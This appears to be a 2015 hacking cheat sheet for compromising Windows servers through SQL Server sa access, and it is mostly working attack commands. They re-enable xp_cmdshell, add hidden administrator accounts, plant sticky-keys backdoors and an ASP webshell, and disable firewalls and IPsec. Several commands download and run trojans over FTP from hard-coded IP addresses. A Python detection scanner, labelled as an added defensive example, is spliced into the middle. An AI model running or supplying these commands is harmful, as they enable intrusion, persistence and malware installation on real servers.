Posted on 3/18/2015 10:36:56 AM
SQL Server (port 1433) repair commands
net user SQLDebugger list /add
net localgroup administrators SQLDebugger /add
Error message: Could not find stored procedure 'master..xp_cmdshell'.
Repair method: very general; in fact the 126 and 127 errors below can be repaired together with it.
Except for a missing xplog70.dll, everything else can be fixed with these commands.
xp_cmdshell new recovery method
Step 1: Delete:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
If these report the following errors, that is expected:
Server: Msg 3701, Level 11, State 5, Line 1
Cannot drop the procedure 'sp_addextendedproc', because it does not exist in the system catalog.
Server: Msg 3701, Level 11, State 5, Procedure sp_dropextendedproc, Line 18
Cannot drop the procedure 'xp_cmdshell', because it does not exist in the system catalog.
Step 2: Recovery:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This recovers directly, regardless of whether sp_addextendedproc exists.
xplog70.dll fix:
Error message: The DLL xplog70.dll, or one of the DLLs it references, could not be loaded. Reason: 126 (The specified module could not be found.)
Fix xplog70.dll (first check the backup directory \x86\bin for the file, then register it from the directory below):
Step 1: exec sp_dropextendedproc 'xp_cmdshell'
Step 2: dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Could not find stored procedure 'master..xp_cmdshell'.
Step 1: recreate sp_addextendedproc:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
Step 2: EXEC sp_addextendedproc xp_cmdshell, @dllname ='xplog70.dll'
Error message: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
Fix:
; EXEC sp_configure 'show advanced options', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'show advanced options', 0 --
Remove dangerous SQL stored procedures:
DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc
Restore extended stored procedures. Restore sp_addextendedproc first; the statement is as follows:
First:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
Second:
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
Delete the extended stored procedure xp_cmdshell: exec sp_dropextendedproc 'xp_cmdshell'
Recover xp_cmdshell: exec sp_addextendedproc xp_cmdshell, @dllname ='xplog70.dll'
Open xp_cmdshell (same statement): exec sp_addextendedproc xp_cmdshell, @dllname ='xplog70.dll'
Determine whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A return value of 1 means it is OK.
Restore xp_cmdshell (the procedure is sp_addextendedproc; there is no master.dbo.addextendedproc):
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A return value of 1 means it is OK. Otherwise, upload xplog70.dll and register it by full path:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Block xp_cmdshell: sp_dropextendedproc "xp_cmdshell"
One. Changing the sa password. Method: after connecting with the SQL comprehensive utilization tool, execute the command: exec sp_password NULL, 'new password', 'sa' (Hint: use with caution!)
Two. Simply patching the weak-password hole.
Method 1: after connecting with the Query Analyzer, run:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
Then press F5 to execute the command.
Method 2: after connecting with the Query Analyzer, Step 1: execute use master; Step 2: sp_dropextendedproc 'xp_cmdshell'; then press F5 to execute the command.
The DLL xpsql70.dll, or one of the DLLs it references, cannot be loaded. Reason 126 (The specified module could not be found.)
Recovery method: after connecting with the Query Analyzer,
Step 1: sp_dropextendedproc "xp_cmdshell"
Step 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
The function xp_cmdshell cannot be found in the library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)
Recovery method: after connecting with the Query Analyzer,
Step 1: exec sp_dropextendedproc 'xp_cmdshell'
Step 2: exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Then press F5 to execute the commands.
If none of the above methods recovers it, try adding the account directly with the following method. After connecting with the Query Analyzer:
Windows 2000 Server system:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP or 2003 Server system (126 error) commands:
declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
Statements executed in the Query Analyzer:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Sometimes, when executing the above statements over a Query Analyzer connection, the stored procedure sp_addextendedproc cannot be found.
Workaround:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
Paste this code into the Query Analyzer and execute it.
Explorer:
c:\windows\explorer.exe
List a directory: exec master.dbo.xp_subdirs 'c:\'
List disks: exec master..xp_fixeddrives
xpsql.cpp: Error 5 from CreateProcess (line 737). Add the account directly:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Enable Terminal Services (3389) through a .reg file written with echo:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Open 3389:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Close 3389:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Check the 3389 port:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Plain CMD backdoor:
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
Win2K: plant a trojan directly through sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
Win2003/XP: plant a trojan directly through sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Shift backdoor commands:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Equivalent cmd commands:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Run a command through wscript.shell:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' -- XXXXX is the command you want to execute
Write a value to a specified registry key (example: write bbb to the value aaaValue under HKEY_LOCAL_MACHINE\SOFTWARE\aaa):
EXEC master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
First, copy ftp.exe to the wmpub directory:
@echo cd c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Open 3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL writes a one-line webshell:
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
sa sandbox mode escalation:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 shift backdoor
Intrusion statement:
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe'
Recovery:
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', @value_name='Debugger', @type='REG_SZ', @value=''
Image hijacking
EXEC master..xp_regwrite --- this is registry editing!
@rootkey='HKEY_LOCAL_MACHINE', --- this is the root key!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', --- this is the key path!
@value_name='Debugger', --- this is the value name!
@type='REG_SZ', --- this is the value type!
@value='C:\WINDOWS\explorer.exe' --- this is the content written!
The whole process is done with the master..xp_regwrite component.
1.sql command to query if the registry sticky key has been hijacked
exec master.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql command hijacks the registry sticky key function and replaces it with the task manager (of course you can replace it with other commands you want)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql command to remove the hijacking feature of the registry sticky key protects your server from being exploited by others
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL writes files:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscript.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Escalation script that does not use net.exe:
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("Wscript.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " created successfully!"
wscript.quit
end if
Next
Wscript.echo struser & " user creation failed!"
Save the above as user.vbs, then execute: cscript user.vbs username password
Using JET sandbox mode, you can get around the problems caused by stored procedures such as xp_cmdshell and their related DLLs. For security reasons, the system does not turn on sandbox mode by default, so xp_regwrite is needed to turn it on:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Then execute the sandbox command to add a user named test with the password 1234 to the system:
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')
Different operating systems have different paths, which need to be adjusted to the situation:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
In addition, in Microsoft SQL Server 2005, some stored procedures are closed by default and require commands to open:
Turn on XP_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Open 'OPENROWSET':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ad Hoc Distributed Queries',1; RECONFIGURE;
Turn on 'sp_oacreate':
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ole Automation Procedures',1; RECONFIGURE;
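From the defender's side, the three sp_configure enables above, together with the sp_addextendedproc/dbcc addextendedproc re-registration, the xp_regwrite writes to Image File Execution Options and the Jet SandBoxMode key, the OpenRowSet Jet shell() trick and sp_oacreate of wscript.shell used elsewhere in this post, are exactly the statements to alert on wherever captured statement text is available (SQL Audit, Extended Events, a trace). The following scanner is an added example, not part of the original post; it assumes a hypothetical record format of timestamp|login|statement, and the sample records are constructed from the statements this post lists.

```python
import re

# Detection rules for the statement patterns this post documents. Each rule
# is (label, compiled regex) and is applied to one captured statement.
RULES = [
    ("enable_xp_cmdshell",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("enable_ole_automation",
     re.compile(r"sp_configure\s+'Ole Automation Procedures'\s*,\s*1", re.I)),
    ("enable_adhoc_queries",
     re.compile(r"sp_configure\s+'Ad Hoc Distributed Queries'\s*,\s*1", re.I)),
    ("reregister_extended_proc",
     re.compile(r"\b(sp_addextendedproc|dbcc\s+addextendedproc)\b", re.I)),
    ("ifeo_debugger_write",
     re.compile(r"xp_regwrite.*Image File Execution Options", re.I | re.S)),
    ("jet_sandbox_toggle",
     re.compile(r"xp_regwrite.*Jet\\4\.0\\Engines.*SandBoxMode", re.I | re.S)),
    ("jet_shell_openrowset",
     re.compile(r"openrowset\s*\(\s*'microsoft\.jet\.oledb\.4\.0'.*shell\s*\(",
                re.I | re.S)),
    ("ole_automation_object",
     re.compile(r"sp_oacreate\s+'(wscript\.shell|scripting\.filesystemobject)'",
                re.I)),
]


def classify(statement):
    """Return the labels of every rule that matches one captured statement."""
    return [label for label, rx in RULES if rx.search(statement)]


def scan(records):
    """Scan 'timestamp|login|statement' records (a constructed format for this
    example) and return one hit dict per record that matches at least one rule.
    Records that do not split into exactly three fields are skipped."""
    hits = []
    for raw in records:
        parts = raw.rstrip("\n").split("|", 2)
        if len(parts) != 3:
            continue
        ts, login, stmt = parts
        labels = classify(stmt)
        if labels:
            hits.append({"time": ts, "login": login, "labels": labels})
    return hits


def count_by_label(hits):
    """Count how many hits each rule label produced."""
    counts = {}
    for hit in hits:
        for label in hit["labels"]:
            counts[label] = counts.get(label, 0) + 1
    return counts


# Constructed sample records; the statements are the ones this post lists.
SAMPLE_LOG = [
    "2015-03-18T10:36:50|sa|EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    "2015-03-18T10:36:51|sa|EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "2015-03-18T10:36:52|webapp|SELECT name FROM sys.tables",
    "2015-03-18T10:36:53|sa|dbcc addextendedproc (\"xp_cmdshell\",\"xplog70.dll\")",
    "2015-03-18T10:36:54|sa|EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE',"
    "'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
    "\\sethc.exe','Debugger','REG_SZ','C:\\WINDOWS\\explorer.exe'",
    "2015-03-18T10:36:55|sa|exec master..xp_regwrite 'HKEY_LOCAL_MACHINE',"
    "'SOFTWARE\\Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',1",
    "2015-03-18T10:36:56|sa|select * from openrowset('microsoft.jet.oledb.4.0',"
    "'; database=c:\\windows\\system32\\ias\\ias.mdb',"
    "'select shell(\"net user test 1234 /add\")')",
    "2015-03-18T10:36:57|sa|declare @o int exec sp_oacreate 'wscript.shell', @o out",
    "malformed record without separators",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["login"], ",".join(hit["labels"]))
```

The 'show advanced options' toggle on its own is deliberately not a rule, since it is also flipped by routine administration; the rules fire on the specific features being switched on or abused.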
Here are a few situations where executing commands as sa gives an error:
1. The DLL xpsql70.dll, or one of the DLLs it references, cannot be loaded. Reason 126 (The specified module could not be found.)
This situation is relatively common, and the repair is simple, but it has a precondition. If you can list directories in this situation (sqltools v2.0 has a directory-listing function), congratulations: 80% of such cases can be fixed. If you can list directories, just find the path of xplog70.dll and execute the following commands.
Step 1: exec sp_dropextendedproc 'xp_cmdshell'
(this command deletes the original xp_cmdshell, because it is already broken)
Step 2: dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll") ; EXEC sp_configure 'show advanced options', 0 --
Of course these are SQL commands, executed with the Query Analyzer. The c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll in the second step is the path of xplog70.dll; this path is the common one, and if the C drive does not have it, look on other drive letters.
2. Cannot find the function xp_cmdshell in the library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)
In fact this is the same as the 126 error above: xp_cmdshell is broken, and as long as you find a backup xplog70.dll you can follow the method above to fix it.
3. Could not find stored procedure 'master..xp_cmdshell'
In this case, the method I see on the Internet is:
Step 1: Delete:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Step 2: Recovery:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
In fact this is still the same as the above. If you look carefully, the 126 and 127 cases above only report "Could not find stored procedure 'master..xp_cmdshell'" because the first step deleted the xp_cmdshell stored procedure.
So in this case, just follow the second step above.
4. Error message: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
This situation is the simplest, because you don't have to think about anything; just execute the following commands:
; EXEC sp_configure 'show advanced options', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; RECONFIGURE WITH OVERRIDE --
; EXEC sp_configure 'show advanced options', 0 --
After the above fix you can execute cmd commands, and privilege escalation begins. I usually check the IP first to see whether it is on an intranet, then run REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber to check the terminal port, then netstat -an to see whether the terminal is open, then net user user password /add to add a user, then net localgroup administrators user /add. If everything goes well, this takes down a server. But there are many problems along the way.
1. The net escalation succeeds but the terminal cannot be connected. There are the following situations:
(1) The server is on an intranet.
(2) TCP/IP filtering. Run the following cmd commands first:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip (exports the first part of the registry concerning TCP/IP filtering)
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip (exports the second part)
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip (exports the third part)
Then go to the C drive, download 1.reg, 2.reg and 3.reg to your own machine to edit, and find the EnableSecurityFilters field to see whether the dword value is 00000000. If it is 00000001, the administrator has set up TCP/IP filtering; just change the 1 to 0, and make the same change in 2.reg and 3.reg.
(3) An IP security policy is in place. Run the cmd command cmd /c net stop policyagent to stop the IPSEC Services service, then connect to the terminal again.
(4) The administrator has restricted terminal logon to specified users.
(5) Firewall. Run the cmd commands: net stop alg /y and net stop sharedaccess
2. The net escalation reports access denied. You can try net1 user user password /add. If net1 also denies access, you can copy a shift backdoor and try to execute the cmd commands:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
If the prompt says "1 file(s) copied", it succeeded. Connect to the terminal and press Shift five times to see what pops up. With Explorer up, just add a user by hand.
3. The net escalation reports access denied, error 5 (important). In this case you don't need to try net1; you can try the copy-shift backdoor, and if the copy reports "0 file(s) copied", it was not successful. Then you can try uploading: if you can upload, send up the non-net escalation tool that came out some time ago and add a user. But in most of these cases you cannot upload, so you have to think harder. Since cmd can be executed, a file can be downloaded through cmd with ftp, but the precondition for ftp is being able to write a text or batch file. You can write a text or batch file through a SQL statement.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp account'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp password'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (no net escalation script) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
After the Query Analyzer executes this successfully, a 1.bat appears on the C drive (if the execution succeeds but nothing appears on the C drive, change the folder you write to, because some servers prohibit writing to the root of the C drive). Then cmd executes ftp -s:c:\1.bat, which downloads the non-net escalation script to the C drive via FTP. Or write a VBS escalation script directly:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Then cmd executes cscript c:\1.vbs
4. The fixes above get cmd commands executing, but after some repairs new problems appear.
(1) Message: An error occurred during the execution of xp_cmdshell. Call 'CreateProcess' failed with error code: '5'. Error 5 is a system error number, and CreateProcess means creating a process. This error has a lot to do with the system file cmd.exe: either cmd.exe has been deleted, or its permissions have been reduced.
SQL to check the terminal port and whether it is open:
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Okay, the key point below is to use two SQL statements to copy the system's explorer.exe over the system's shift-backdoor file; the two statements are executed separately.
This statement copies explorer.exe as sethc.exe:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
This statement copies sethc.exe to the dllcache directory:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
